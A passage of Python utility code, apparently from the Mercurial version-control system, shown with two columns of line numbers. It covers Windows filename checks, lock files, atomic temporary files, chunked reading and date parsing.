1263 1262 "directory name ends with '\\', which is invalid on Windows"
1264 1263 '''
1265 1264 if path.endswith('\\'):
1266 1265 return _("filename ends with '\\', which is invalid on Windows")
1267 1266 if '\\/' in path:
1268 1267 return _("directory name ends with '\\', which is invalid on Windows")
1269 1268 for n in path.replace('\\', '/').split('/'):
1270 1269 if not n:
1271 1270 continue
1272 1271 for c in _filenamebytestr(n):
1273 1272 if c in _winreservedchars:
1274 1273 return _("filename contains '%s', which is reserved "
1275 1274 "on Windows") % c
1276 1275 if ord(c) <= 31:
1277 1276 return _("filename contains %r, which is invalid "
1278 1277 "on Windows") % c
1279 1278 base = n.split('.')[0]
1280 1279 if base and base.lower() in _winreservednames:
1281 1280 return _("filename contains '%s', which is reserved "
1282 1281 "on Windows") % base
1283 1282 t = n[-1]
1284 1283 if t in '. ' and n not in '..':
1285 1284 return _("filename ends with '%s', which is not allowed "
1286 1285 "on Windows") % t
1287 1286
1288 1287 if pycompat.osname == 'nt':
1289 1288 checkosfilename = checkwinfilename
1290 1289 timer = time.clock
1291 1290 else:
1292 1291 checkosfilename = platform.checkosfilename
1293 1292 timer = time.time
1294 1293
1295 1294 if safehasattr(time, "perf_counter"):
1296 1295 timer = time.perf_counter
1297 1296
1298 1297 def makelock(info, pathname):
1299 1298 try:
1300 1299 return os.symlink(info, pathname)
1301 1300 except OSError as why:
1302 1301 if why.errno == errno.EEXIST:
1303 1302 raise
1304 1303 except AttributeError: # no symlink in os
1305 1304 pass
1306 1305
1307 1306 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1308 1307 os.write(ld, info)
1309 1308 os.close(ld)
1310 1309
1311 1310 def readlock(pathname):
1312 1311 try:
1313 1312 return os.readlink(pathname)
1314 1313 except OSError as why:
1315 1314 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1316 1315 raise
1317 1316 except AttributeError: # no symlink in os
1318 1317 pass
1319 1318 fp = posixfile(pathname)
1320 1319 r = fp.read()
1321 1320 fp.close()
1322 1321 return r
1323 1322
1324 1323 def fstat(fp):
1325 1324 '''stat file object that may not have fileno method.'''
1326 1325 try:
1327 1326 return os.fstat(fp.fileno())
1328 1327 except AttributeError:
1329 1328 return os.stat(fp.name)
1330 1329
1331 1330 # File system features
1332 1331
1333 1332 def fscasesensitive(path):
1334 1333 """
1335 1334 Return true if the given path is on a case-sensitive filesystem
1336 1335
1337 1336 Requires a path (like /foo/.hg) ending with a foldable final
1338 1337 directory component.
1339 1338 """
1340 1339 s1 = os.lstat(path)
1341 1340 d, b = os.path.split(path)
1342 1341 b2 = b.upper()
1343 1342 if b == b2:
1344 1343 b2 = b.lower()
1345 1344 if b == b2:
1346 1345 return True # no evidence against case sensitivity
1347 1346 p2 = os.path.join(d, b2)
1348 1347 try:
1349 1348 s2 = os.lstat(p2)
1350 1349 if s2 == s1:
1351 1350 return False
1352 1351 return True
1353 1352 except OSError:
1354 1353 return True
1355 1354
1356 1355 try:
1357 1356 import re2
1358 1357 _re2 = None
1359 1358 except ImportError:
1360 1359 _re2 = False
1361 1360
1362 1361 class _re(object):
1363 1362 def _checkre2(self):
1364 1363 global _re2
1365 1364 try:
1366 1365 # check if match works, see issue3964
1367 1366 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1368 1367 except ImportError:
1369 1368 _re2 = False
1370 1369
1371 1370 def compile(self, pat, flags=0):
1372 1371 '''Compile a regular expression, using re2 if possible
1373 1372
1374 1373 For best performance, use only re2-compatible regexp features. The
1375 1374 only flags from the re module that are re2-compatible are
1376 1375 IGNORECASE and MULTILINE.'''
1377 1376 if _re2 is None:
1378 1377 self._checkre2()
1379 1378 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1380 1379 if flags & remod.IGNORECASE:
1381 1380 pat = '(?i)' + pat
1382 1381 if flags & remod.MULTILINE:
1383 1382 pat = '(?m)' + pat
1384 1383 try:
1385 1384 return re2.compile(pat)
1386 1385 except re2.error:
1387 1386 pass
1388 1387 return remod.compile(pat, flags)
1389 1388
1390 1389 @propertycache
1391 1390 def escape(self):
1392 1391 '''Return the version of escape corresponding to self.compile.
1393 1392
1394 1393 This is imperfect because whether re2 or re is used for a particular
1395 1394 function depends on the flags, etc, but it's the best we can do.
1396 1395 '''
1397 1396 global _re2
1398 1397 if _re2 is None:
1399 1398 self._checkre2()
1400 1399 if _re2:
1401 1400 return re2.escape
1402 1401 else:
1403 1402 return remod.escape
1404 1403
1405 1404 re = _re()
1406 1405
1407 1406 _fspathcache = {}
1408 1407 def fspath(name, root):
1409 1408 '''Get name in the case stored in the filesystem
1410 1409
1411 1410 The name should be relative to root, and be normcase-ed for efficiency.
1412 1411
1413 1412 Note that this function is unnecessary, and should not be
1414 1413 called, for case-sensitive filesystems (simply because it's expensive).
1415 1414
1416 1415 The root should be normcase-ed, too.
1417 1416 '''
1418 1417 def _makefspathcacheentry(dir):
1419 1418 return dict((normcase(n), n) for n in os.listdir(dir))
1420 1419
1421 1420 seps = pycompat.ossep
1422 1421 if pycompat.osaltsep:
1423 1422 seps = seps + pycompat.osaltsep
1424 1423 # Protect backslashes. This gets silly very quickly.
1425 1424 seps.replace('\\','\\\\')
1426 1425 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1427 1426 dir = os.path.normpath(root)
1428 1427 result = []
1429 1428 for part, sep in pattern.findall(name):
1430 1429 if sep:
1431 1430 result.append(sep)
1432 1431 continue
1433 1432
1434 1433 if dir not in _fspathcache:
1435 1434 _fspathcache[dir] = _makefspathcacheentry(dir)
1436 1435 contents = _fspathcache[dir]
1437 1436
1438 1437 found = contents.get(part)
1439 1438 if not found:
1440 1439 # retry "once per directory" per "dirstate.walk" which
1441 1440 # may take place for each patches of "hg qpush", for example
1442 1441 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1443 1442 found = contents.get(part)
1444 1443
1445 1444 result.append(found or part)
1446 1445 dir = os.path.join(dir, part)
1447 1446
1448 1447 return ''.join(result)
1449 1448
1450 1449 def getfstype(dirpath):
1451 1450 '''Get the filesystem type name from a directory (best-effort)
1452 1451
1453 1452 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1454 1453 '''
1455 1454 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1456 1455
1457 1456 def checknlink(testfile):
1458 1457 '''check whether hardlink count reporting works properly'''
1459 1458
1460 1459 # testfile may be open, so we need a separate file for checking to
1461 1460 # work around issue2543 (or testfile may get lost on Samba shares)
1462 1461 f1 = testfile + ".hgtmp1"
1463 1462 if os.path.lexists(f1):
1464 1463 return False
1465 1464 try:
1466 1465 posixfile(f1, 'w').close()
1467 1466 except IOError:
1468 1467 try:
1469 1468 os.unlink(f1)
1470 1469 except OSError:
1471 1470 pass
1472 1471 return False
1473 1472
1474 1473 f2 = testfile + ".hgtmp2"
1475 1474 fd = None
1476 1475 try:
1477 1476 oslink(f1, f2)
1478 1477 # nlinks() may behave differently for files on Windows shares if
1479 1478 # the file is open.
1480 1479 fd = posixfile(f2)
1481 1480 return nlinks(f2) > 1
1482 1481 except OSError:
1483 1482 return False
1484 1483 finally:
1485 1484 if fd is not None:
1486 1485 fd.close()
1487 1486 for f in (f1, f2):
1488 1487 try:
1489 1488 os.unlink(f)
1490 1489 except OSError:
1491 1490 pass
1492 1491
1493 1492 def endswithsep(path):
1494 1493 '''Check path ends with os.sep or os.altsep.'''
1495 1494 return (path.endswith(pycompat.ossep)
1496 1495 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1497 1496
1498 1497 def splitpath(path):
1499 1498 '''Split path by os.sep.
1500 1499 Note that this function does not use os.altsep because this is
1501 1500 an alternative of simple "xxx.split(os.sep)".
1502 1501 It is recommended to use os.path.normpath() before using this
1503 1502 function if need.'''
1504 1503 return path.split(pycompat.ossep)
1505 1504
1506 1505 def gui():
1507 1506 '''Are we running in a GUI?'''
1508 1507 if pycompat.sysplatform == 'darwin':
1509 1508 if 'SSH_CONNECTION' in encoding.environ:
1510 1509 # handle SSH access to a box where the user is logged in
1511 1510 return False
1512 1511 elif getattr(osutil, 'isgui', None):
1513 1512 # check if a CoreGraphics session is available
1514 1513 return osutil.isgui()
1515 1514 else:
1516 1515 # pure build; use a safe default
1517 1516 return True
1518 1517 else:
1519 1518 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1520 1519
1521 1520 def mktempcopy(name, emptyok=False, createmode=None):
1522 1521 """Create a temporary file with the same contents from name
1523 1522
1524 1523 The permission bits are copied from the original file.
1525 1524
1526 1525 If the temporary file is going to be truncated immediately, you
1527 1526 can use emptyok=True as an optimization.
1528 1527
1529 1528 Returns the name of the temporary file.
1530 1529 """
1531 1530 d, fn = os.path.split(name)
1532 1531 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1533 1532 os.close(fd)
1534 1533 # Temporary files are created with mode 0600, which is usually not
1535 1534 # what we want. If the original file already exists, just copy
1536 1535 # its mode. Otherwise, manually obey umask.
1537 1536 copymode(name, temp, createmode)
1538 1537 if emptyok:
1539 1538 return temp
1540 1539 try:
1541 1540 try:
1542 1541 ifp = posixfile(name, "rb")
1543 1542 except IOError as inst:
1544 1543 if inst.errno == errno.ENOENT:
1545 1544 return temp
1546 1545 if not getattr(inst, 'filename', None):
1547 1546 inst.filename = name
1548 1547 raise
1549 1548 ofp = posixfile(temp, "wb")
1550 1549 for chunk in filechunkiter(ifp):
1551 1550 ofp.write(chunk)
1552 1551 ifp.close()
1553 1552 ofp.close()
1554 1553 except: # re-raises
1555 1554 try: os.unlink(temp)
1556 1555 except OSError: pass
1557 1556 raise
1558 1557 return temp
1559 1558
1560 1559 class filestat(object):
1561 1560 """help to exactly detect change of a file
1562 1561
1563 1562 'stat' attribute is result of 'os.stat()' if specified 'path'
1564 1563 exists. Otherwise, it is None. This can avoid preparative
1565 1564 'exists()' examination on client side of this class.
1566 1565 """
1567 1566 def __init__(self, stat):
1568 1567 self.stat = stat
1569 1568
1570 1569 @classmethod
1571 1570 def frompath(cls, path):
1572 1571 try:
1573 1572 stat = os.stat(path)
1574 1573 except OSError as err:
1575 1574 if err.errno != errno.ENOENT:
1576 1575 raise
1577 1576 stat = None
1578 1577 return cls(stat)
1579 1578
1580 1579 @classmethod
1581 1580 def fromfp(cls, fp):
1582 1581 stat = os.fstat(fp.fileno())
1583 1582 return cls(stat)
1584 1583
1585 1584 __hash__ = object.__hash__
1586 1585
1587 1586 def __eq__(self, old):
1588 1587 try:
1589 1588 # if ambiguity between stat of new and old file is
1590 1589 # avoided, comparison of size, ctime and mtime is enough
1591 1590 # to exactly detect change of a file regardless of platform
1592 1591 return (self.stat.st_size == old.stat.st_size and
1593 1592 self.stat.st_ctime == old.stat.st_ctime and
1594 1593 self.stat.st_mtime == old.stat.st_mtime)
1595 1594 except AttributeError:
1596 1595 pass
1597 1596 try:
1598 1597 return self.stat is None and old.stat is None
1599 1598 except AttributeError:
1600 1599 return False
1601 1600
1602 1601 def isambig(self, old):
1603 1602 """Examine whether new (= self) stat is ambiguous against old one
1604 1603
1605 1604 "S[N]" below means stat of a file at N-th change:
1606 1605
1607 1606 - S[n-1].ctime < S[n].ctime: can detect change of a file
1608 1607 - S[n-1].ctime == S[n].ctime
1609 1608 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1610 1609 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1611 1610 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1612 1611 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1613 1612
1614 1613 Case (*2) above means that a file was changed twice or more at
1615 1614 same time in sec (= S[n-1].ctime), and comparison of timestamp
1616 1615 is ambiguous.
1617 1616
1618 1617 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1619 1618 timestamp is ambiguous".
1620 1619
1621 1620 But advancing mtime only in case (*2) doesn't work as
1622 1621 expected, because naturally advanced S[n].mtime in case (*1)
1623 1622 might be equal to manually advanced S[n-1 or earlier].mtime.
1624 1623
1625 1624 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1626 1625 treated as ambiguous regardless of mtime, to avoid overlooking
1627 1626 by confliction between such mtime.
1628 1627
1629 1628 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1630 1629 S[n].mtime", even if size of a file isn't changed.
1631 1630 """
1632 1631 try:
1633 1632 return (self.stat.st_ctime == old.stat.st_ctime)
1634 1633 except AttributeError:
1635 1634 return False
1636 1635
1637 1636 def avoidambig(self, path, old):
1638 1637 """Change file stat of specified path to avoid ambiguity
1639 1638
1640 1639 'old' should be previous filestat of 'path'.
1641 1640
1642 1641 This skips avoiding ambiguity, if a process doesn't have
1643 1642 appropriate privileges for 'path'. This returns False in this
1644 1643 case.
1645 1644
1646 1645 Otherwise, this returns True, as "ambiguity is avoided".
1647 1646 """
1648 1647 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1649 1648 try:
1650 1649 os.utime(path, (advanced, advanced))
1651 1650 except OSError as inst:
1652 1651 if inst.errno == errno.EPERM:
1653 1652 # utime() on the file created by another user causes EPERM,
1654 1653 # if a process doesn't have appropriate privileges
1655 1654 return False
1656 1655 raise
1657 1656 return True
1658 1657
1659 1658 def __ne__(self, other):
1660 1659 return not self == other
1661 1660
1662 1661 class atomictempfile(object):
1663 1662 '''writable file object that atomically updates a file
1664 1663
1665 1664 All writes will go to a temporary copy of the original file. Call
1666 1665 close() when you are done writing, and atomictempfile will rename
1667 1666 the temporary copy to the original name, making the changes
1668 1667 visible. If the object is destroyed without being closed, all your
1669 1668 writes are discarded.
1670 1669
1671 1670 checkambig argument of constructor is used with filestat, and is
1672 1671 useful only if target file is guarded by any lock (e.g. repo.lock
1673 1672 or repo.wlock).
1674 1673 '''
1675 1674 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1676 1675 self.__name = name # permanent name
1677 1676 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1678 1677 createmode=createmode)
1679 1678 self._fp = posixfile(self._tempname, mode)
1680 1679 self._checkambig = checkambig
1681 1680
1682 1681 # delegated methods
1683 1682 self.read = self._fp.read
1684 1683 self.write = self._fp.write
1685 1684 self.seek = self._fp.seek
1686 1685 self.tell = self._fp.tell
1687 1686 self.fileno = self._fp.fileno
1688 1687
1689 1688 def close(self):
1690 1689 if not self._fp.closed:
1691 1690 self._fp.close()
1692 1691 filename = localpath(self.__name)
1693 1692 oldstat = self._checkambig and filestat.frompath(filename)
1694 1693 if oldstat and oldstat.stat:
1695 1694 rename(self._tempname, filename)
1696 1695 newstat = filestat.frompath(filename)
1697 1696 if newstat.isambig(oldstat):
1698 1697 # stat of changed file is ambiguous to original one
1699 1698 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1700 1699 os.utime(filename, (advanced, advanced))
1701 1700 else:
1702 1701 rename(self._tempname, filename)
1703 1702
1704 1703 def discard(self):
1705 1704 if not self._fp.closed:
1706 1705 try:
1707 1706 os.unlink(self._tempname)
1708 1707 except OSError:
1709 1708 pass
1710 1709 self._fp.close()
1711 1710
1712 1711 def __del__(self):
1713 1712 if safehasattr(self, '_fp'): # constructor actually did something
1714 1713 self.discard()
1715 1714
1716 1715 def __enter__(self):
1717 1716 return self
1718 1717
1719 1718 def __exit__(self, exctype, excvalue, traceback):
1720 1719 if exctype is not None:
1721 1720 self.discard()
1722 1721 else:
1723 1722 self.close()
1724 1723
1725 1724 def unlinkpath(f, ignoremissing=False):
1726 1725 """unlink and remove the directory if it is empty"""
1727 1726 if ignoremissing:
1728 1727 tryunlink(f)
1729 1728 else:
1730 1729 unlink(f)
1731 1730 # try removing directories that might now be empty
1732 1731 try:
1733 1732 removedirs(os.path.dirname(f))
1734 1733 except OSError:
1735 1734 pass
1736 1735
1737 1736 def tryunlink(f):
1738 1737 """Attempt to remove a file, ignoring ENOENT errors."""
1739 1738 try:
1740 1739 unlink(f)
1741 1740 except OSError as e:
1742 1741 if e.errno != errno.ENOENT:
1743 1742 raise
1744 1743
1745 1744 def makedirs(name, mode=None, notindexed=False):
1746 1745 """recursive directory creation with parent mode inheritance
1747 1746
1748 1747 Newly created directories are marked as "not to be indexed by
1749 1748 the content indexing service", if ``notindexed`` is specified
1750 1749 for "write" mode access.
1751 1750 """
1752 1751 try:
1753 1752 makedir(name, notindexed)
1754 1753 except OSError as err:
1755 1754 if err.errno == errno.EEXIST:
1756 1755 return
1757 1756 if err.errno != errno.ENOENT or not name:
1758 1757 raise
1759 1758 parent = os.path.dirname(os.path.abspath(name))
1760 1759 if parent == name:
1761 1760 raise
1762 1761 makedirs(parent, mode, notindexed)
1763 1762 try:
1764 1763 makedir(name, notindexed)
1765 1764 except OSError as err:
1766 1765 # Catch EEXIST to handle races
1767 1766 if err.errno == errno.EEXIST:
1768 1767 return
1769 1768 raise
1770 1769 if mode is not None:
1771 1770 os.chmod(name, mode)
1772 1771
1773 1772 def readfile(path):
1774 1773 with open(path, 'rb') as fp:
1775 1774 return fp.read()
1776 1775
1777 1776 def writefile(path, text):
1778 1777 with open(path, 'wb') as fp:
1779 1778 fp.write(text)
1780 1779
1781 1780 def appendfile(path, text):
1782 1781 with open(path, 'ab') as fp:
1783 1782 fp.write(text)
1784 1783
1785 1784 class chunkbuffer(object):
1786 1785 """Allow arbitrary sized chunks of data to be efficiently read from an
1787 1786 iterator over chunks of arbitrary size."""
1788 1787
1789 1788 def __init__(self, in_iter):
1790 1789 """in_iter is the iterator that's iterating over the input chunks."""
1791 1790 def splitbig(chunks):
1792 1791 for chunk in chunks:
1793 1792 if len(chunk) > 2**20:
1794 1793 pos = 0
1795 1794 while pos < len(chunk):
1796 1795 end = pos + 2 ** 18
1797 1796 yield chunk[pos:end]
1798 1797 pos = end
1799 1798 else:
1800 1799 yield chunk
1801 1800 self.iter = splitbig(in_iter)
1802 1801 self._queue = collections.deque()
1803 1802 self._chunkoffset = 0
1804 1803
1805 1804 def read(self, l=None):
1806 1805 """Read L bytes of data from the iterator of chunks of data.
1807 1806 Returns less than L bytes if the iterator runs dry.
1808 1807
1809 1808 If size parameter is omitted, read everything"""
1810 1809 if l is None:
1811 1810 return ''.join(self.iter)
1812 1811
1813 1812 left = l
1814 1813 buf = []
1815 1814 queue = self._queue
1816 1815 while left > 0:
1817 1816 # refill the queue
1818 1817 if not queue:
1819 1818 target = 2**18
1820 1819 for chunk in self.iter:
1821 1820 queue.append(chunk)
1822 1821 target -= len(chunk)
1823 1822 if target <= 0:
1824 1823 break
1825 1824 if not queue:
1826 1825 break
1827 1826
1828 1827 # The easy way to do this would be to queue.popleft(), modify the
1829 1828 # chunk (if necessary), then queue.appendleft(). However, for cases
1830 1829 # where we read partial chunk content, this incurs 2 dequeue
1831 1830 # mutations and creates a new str for the remaining chunk in the
1832 1831 # queue. Our code below avoids this overhead.
1833 1832
1834 1833 chunk = queue[0]
1835 1834 chunkl = len(chunk)
1836 1835 offset = self._chunkoffset
1837 1836
1838 1837 # Use full chunk.
1839 1838 if offset == 0 and left >= chunkl:
1840 1839 left -= chunkl
1841 1840 queue.popleft()
1842 1841 buf.append(chunk)
1843 1842 # self._chunkoffset remains at 0.
1844 1843 continue
1845 1844
1846 1845 chunkremaining = chunkl - offset
1847 1846
1848 1847 # Use all of unconsumed part of chunk.
1849 1848 if left >= chunkremaining:
1850 1849 left -= chunkremaining
1851 1850 queue.popleft()
1852 1851 # offset == 0 is enabled by block above, so this won't merely
1853 1852 # copy via ``chunk[0:]``.
1854 1853 buf.append(chunk[offset:])
1855 1854 self._chunkoffset = 0
1856 1855
1857 1856 # Partial chunk needed.
1858 1857 else:
1859 1858 buf.append(chunk[offset:offset + left])
1860 1859 self._chunkoffset += left
1861 1860 left -= chunkremaining
1862 1861
1863 1862 return ''.join(buf)
1864 1863
1865 1864 def filechunkiter(f, size=131072, limit=None):
1866 1865 """Create a generator that produces the data in the file size
1867 1866 (default 131072) bytes at a time, up to optional limit (default is
1868 1867 to read all data). Chunks may be less than size bytes if the
1869 1868 chunk is the last chunk in the file, or the file is a socket or
1870 1869 some other type of file that sometimes reads less data than is
1871 1870 requested."""
1872 1871 assert size >= 0
1873 1872 assert limit is None or limit >= 0
1874 1873 while True:
1875 1874 if limit is None:
1876 1875 nbytes = size
1877 1876 else:
1878 1877 nbytes = min(limit, size)
1879 1878 s = nbytes and f.read(nbytes)
1880 1879 if not s:
1881 1880 break
1882 1881 if limit:
1883 1882 limit -= len(s)
1884 1883 yield s
1885 1884
1886 1885 def makedate(timestamp=None):
1887 1886 '''Return a unix timestamp (or the current time) as a (unixtime,
1888 1887 offset) tuple based off the local timezone.'''
1889 1888 if timestamp is None:
1890 1889 timestamp = time.time()
1891 1890 if timestamp < 0:
1892 1891 hint = _("check your clock")
1893 1892 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1894 1893 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1895 1894 datetime.datetime.fromtimestamp(timestamp))
1896 1895 tz = delta.days * 86400 + delta.seconds
1897 1896 return timestamp, tz
1898 1897
1899 1898 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1900 1899 """represent a (unixtime, offset) tuple as a localized time.
1901 1900 unixtime is seconds since the epoch, and offset is the time zone's
1902 1901 number of seconds away from UTC.
1903 1902
1904 1903 >>> datestr((0, 0))
1905 1904 'Thu Jan 01 00:00:00 1970 +0000'
1906 1905 >>> datestr((42, 0))
1907 1906 'Thu Jan 01 00:00:42 1970 +0000'
1908 1907 >>> datestr((-42, 0))
1909 1908 'Wed Dec 31 23:59:18 1969 +0000'
1910 1909 >>> datestr((0x7fffffff, 0))
1911 1910 'Tue Jan 19 03:14:07 2038 +0000'
1912 1911 >>> datestr((-0x80000000, 0))
1913 1912 'Fri Dec 13 20:45:52 1901 +0000'
1914 1913 """
1915 1914 t, tz = date or makedate()
1916 1915 if "%1" in format or "%2" in format or "%z" in format:
1917 1916 sign = (tz > 0) and "-" or "+"
1918 1917 minutes = abs(tz) // 60
1919 1918 q, r = divmod(minutes, 60)
1920 1919 format = format.replace("%z", "%1%2")
1921 1920 format = format.replace("%1", "%c%02d" % (sign, q))
1922 1921 format = format.replace("%2", "%02d" % r)
1923 1922 d = t - tz
1924 1923 if d > 0x7fffffff:
1925 1924 d = 0x7fffffff
1926 1925 elif d < -0x80000000:
1927 1926 d = -0x80000000
1928 1927 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1929 1928 # because they use the gmtime() system call which is buggy on Windows
1930 1929 # for negative values.
1931 1930 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1932 1931 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1933 1932 return s
1934 1933
1935 1934 def shortdate(date=None):
1936 1935 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1937 1936 return datestr(date, format='%Y-%m-%d')
1938 1937
1939 1938 def parsetimezone(s):
1940 1939 """find a trailing timezone, if any, in string, and return a
1941 1940 (offset, remainder) pair"""
1942 1941
1943 1942 if s.endswith("GMT") or s.endswith("UTC"):
1944 1943 return 0, s[:-3].rstrip()
1945 1944
1946 1945 # Unix-style timezones [+-]hhmm
1947 1946 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1948 1947 sign = (s[-5] == "+") and 1 or -1
1949 1948 hours = int(s[-4:-2])
1950 1949 minutes = int(s[-2:])
1951 1950 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1952 1951
1953 1952 # ISO8601 trailing Z
1954 1953 if s.endswith("Z") and s[-2:-1].isdigit():
1955 1954 return 0, s[:-1]
1956 1955
1957 1956 # ISO8601-style [+-]hh:mm
1958 1957 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1959 1958 s[-5:-3].isdigit() and s[-2:].isdigit()):
1960 1959 sign = (s[-6] == "+") and 1 or -1
1961 1960 hours = int(s[-5:-3])
1962 1961 minutes = int(s[-2:])
1963 1962 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1964 1963
1965 1964 return None, s
1966 1965
1967 1966 def strdate(string, format, defaults=None):
1968 1967 """parse a localized time string and return a (unixtime, offset) tuple.
1969 1968 if the string cannot be parsed, ValueError is raised."""
1970 1969 if defaults is None:
1971 1970 defaults = {}
1972 1971
1973 1972 # NOTE: unixtime = localunixtime + offset
1974 1973 offset, date = parsetimezone(string)
1975 1974
1976 1975 # add missing elements from defaults
1977 1976 usenow = False # default to using biased defaults
1978 1977 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1979 1978 part = pycompat.bytestr(part)
1980 1979 found = [True for p in part if ("%"+p) in format]
1981 1980 if not found:
1982 1981 date += "@" + defaults[part][usenow]
1983 1982 format += "@%" + part[0]
1984 1983 else:
1985 1984 # We've found a specific time element, less specific time
1986 1985 # elements are relative to today
1987 1986 usenow = True
1988 1987
1989 1988 timetuple = time.strptime(encoding.strfromlocal(date),
1990 1989 encoding.strfromlocal(format))
1991 1990 localunixtime = int(calendar.timegm(timetuple))
1992 1991 if offset is None:
1993 1992 # local timezone
1994 1993 unixtime = int(time.mktime(timetuple))
1995 1994 offset = unixtime - localunixtime
1996 1995 else:
1997 1996 unixtime = localunixtime + offset
1998 1997 return unixtime, offset
1999 1998
2000 1999 def parsedate(date, formats=None, bias=None):
2001 2000 """parse a localized date/time and return a (unixtime, offset) tuple.
2002 2001
2003 2002 The date may be a "unixtime offset" string or in one of the specified
2004 2003 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2005 2004
2006 2005 >>> parsedate(' today ') == parsedate(\
2007 2006 datetime.date.today().strftime('%b %d'))
2008 2007 True
2009 2008 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2010 2009 datetime.timedelta(days=1)\
2011 2010 ).strftime('%b %d'))
2012 2011 True
2013 2012 >>> now, tz = makedate()
2014 2013 >>> strnow, strtz = parsedate('now')
2015 2014 >>> (strnow - now) < 1
2016 2015 True
2017 2016 >>> tz == strtz
2018 2017 True
2019 2018 """
2020 2019 if bias is None:
2021 2020 bias = {}
2022 2021 if not date:
2023 2022 return 0, 0
2024 2023 if isinstance(date, tuple) and len(date) == 2:
2025 2024 return date
2026 2025 if not formats:
2027 2026 formats = defaultdateformats
2028 2027 date = date.strip()
2029 2028
2030 2029 if date == 'now' or date == _('now'):
2031 2030 return makedate()
2032 2031 if date == 'today' or date == _('today'):
2033 2032 date = datetime.date.today().strftime('%b %d')
2034 2033 elif date == 'yesterday' or date == _('yesterday'):
2035 2034 date = (datetime.date.today() -
2036 2035 datetime.timedelta(days=1)).strftime('%b %d')
2037 2036
2038 2037 try:
2039 2038 when, offset = map(int, date.split(' '))
2040 2039 except ValueError:
2041 2040 # fill out defaults
2042 2041 now = makedate()
2043 2042 defaults = {}
2044 2043 for part in ("d", "mb", "yY", "HI", "M", "S"):
2045 2044 # this piece is for rounding the specific end of unknowns
2046 2045 b = bias.get(part)
2047 2046 if b is None:
2048 2047 if part[0:1] in "HMS":
2049 2048 b = "00"
2050 2049 else:
2051 2050 b = "0"
2052 2051
2053 2052 # this piece is for matching the generic end to today's date
2054 2053 n = datestr(now, "%" + part[0:1])
2055 2054
2056 2055 defaults[part] = (b, n)
2057 2056
2058 2057 for format in formats:
2059 2058 try:
2060 2059 when, offset = strdate(date, format, defaults)
2061 2060 except (ValueError, OverflowError):
2062 2061 pass
2063 2062 else:
2064 2063 break
2065 2064 else:
2066 2065 raise error.ParseError(_('invalid date: %r') % date)
2067 2066 # validate explicit (probably user-specified) date and
2068 2067 # time zone offset. values must fit in signed 32 bits for
2069 2068 # current 32-bit linux runtimes. timezones go from UTC-12
2070 2069 # to UTC+14
2071 2070 if when < -0x80000000 or when > 0x7fffffff:
2072 2071 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2073 2072 if offset < -50400 or offset > 43200:
2074 2073 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2075 2074 return when, offset
2076 2075
2077 2076 def matchdate(date):
2078 2077 """Return a function that matches a given date match specifier
2079 2078
2080 2079 Formats include:
2081 2080
2082 2081 '{date}' match a given date to the accuracy provided
2083 2082
2084 2083 '<{date}' on or before a given date
2085 2084
2086 2085 '>{date}' on or after a given date
2087 2086
2088 2087 >>> p1 = parsedate("10:29:59")
2089 2088 >>> p2 = parsedate("10:30:00")
2090 2089 >>> p3 = parsedate("10:30:59")
2091 2090 >>> p4 = parsedate("10:31:00")
2092 2091 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2093 2092 >>> f = matchdate("10:30")
2094 2093 >>> f(p1[0])
2095 2094 False
2096 2095 >>> f(p2[0])
2097 2096 True
2098 2097 >>> f(p3[0])
2099 2098 True
2100 2099 >>> f(p4[0])
2101 2100 False
2102 2101 >>> f(p5[0])
2103 2102 False
2104 2103 """
2105 2104
2106 2105 def lower(date):
2107 2106 d = {'mb': "1", 'd': "1"}
2108 2107 return parsedate(date, extendeddateformats, d)[0]
2109 2108
2110 2109 def upper(date):
2111 2110 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2112 2111 for days in ("31", "30", "29"):
2113 2112 try:
2114 2113 d["d"] = days
2115 2114 return parsedate(date, extendeddateformats, d)[0]
2116 2115 except Abort:
2117 2116 pass
2118 2117 d["d"] = "28"
2119 2118 return parsedate(date, extendeddateformats, d)[0]
2120 2119
2121 2120 date = date.strip()
2122 2121
2123 2122 if not date:
2124 2123 raise Abort(_("dates cannot consist entirely of whitespace"))
2125 2124 elif date[0] == "<":
2126 2125 if not date[1:]:
2127 2126 raise Abort(_("invalid day spec, use '<DATE'"))
2128 2127 when = upper(date[1:])
2129 2128 return lambda x: x <= when
2130 2129 elif date[0] == ">":
2131 2130 if not date[1:]:
